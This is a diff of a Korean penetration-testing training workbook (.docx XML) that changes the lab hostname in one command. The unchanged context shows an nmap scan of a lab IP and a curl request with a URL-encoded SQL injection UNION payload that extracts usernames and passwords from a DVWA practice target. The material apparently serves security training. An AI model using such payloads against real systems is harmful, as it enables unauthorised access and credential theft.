--- a/contents/battle-workbook/attack-adv-w14.docx
+++ b/contents/battle-workbook/attack-adv-w14.docx
@@ -501,7 +501,7 @@
         </w:rPr>
         <w:t>nmap -sV -Pn -p 80,443,3000 192.168.0.161           # 정찰(참고)</w:t>
         <w:br/>
-        <w:t>curl -s -A "aa14r1-kim-pentest" -H "Host: dvwa.6v6.lab" \</w:t>
+        <w:t>curl -s -A "aa14r1-kim-pentest" -H "Host: dvwa.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli/?id=aa14r1-kim%27%20UNION%20SELECT%20user,password%20FROM%20users--+&amp;Submit=Submit"</w:t>
       </w:r>
